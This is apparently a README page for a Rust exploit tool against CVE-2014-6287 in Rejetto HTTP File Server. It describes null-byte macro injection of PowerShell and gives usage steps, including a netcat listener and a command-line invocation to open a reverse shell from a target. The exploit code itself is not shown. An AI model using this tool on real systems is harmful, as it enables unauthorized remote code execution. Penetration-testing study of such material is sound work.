## https://sploitus.com/exploit?id=E5DECDE0-467B-56A8-8701-FD0817B2CA25
# CVE-2014-6287 - Rejetto HTTP File Server RCE Exploit
[](https://www.rust-lang.org/)
[](https://vulners.com/cve/CVE-2014-6287)
A Rust implementation of the CVE-2014-6287 exploit targeting Rejetto HTTP File Server (HFS) versions 2.3x before 2.3c.
## Vulnerability Overview
**CVE-2014-6287** is a critical remote code execution vulnerability in Rejetto HTTP File Server (HFS).
### Technical Details
- **Affected Software**: Rejetto HTTP File Server (HFS) 2.3x before 2.3c
- **Vulnerability Type**: Remote Code Execution (RCE)
- **CVSS Score**: 10.0 (Critical)
- **CWE**: CWE-94 (Improper Control of Generation of Code)
### Description
The `findMacroMarker` function in `parserLib.pas` in Rejetto HTTP File Server allows remote attackers to execute arbitrary programs via a `%00` sequence in a search action. This vulnerability enables attackers to bypass input validation and inject malicious code that gets executed on the target system.
The exploit works by:
1. Crafting a malicious search query containing a null byte (`%00`)
2. Injecting PowerShell commands within macro delimiters `{.` and `.}`
3. The server processes the macro and executes the embedded PowerShell code
4. Establishing a reverse shell connection back to the attacker
## Usage
### Step 1: Set up a Netcat Listener
Before executing the exploit, set up a listener on your attacking machine to catch the reverse shell:
```bash
# Replace with your desired listening port
nc -lvnp
```
### Step 2: Execute the Exploit
```bash
cargo run -- -l -p -r [-t ]
```
#### Required Parameters:
- `-l, --lhost `: Your local IP address (attacker machine)
- `-p, --lport `: Your local port for the reverse shell
- `-r, --rhost `: Target IP address (vulnerable HFS server)
#### Optional Parameters:
- `-t, --rport `: Target port (default: 80)
## Disclaimer
This tool is for educational and authorized penetration testing purposes only. Use responsibly and only on systems you own or have explicit permission to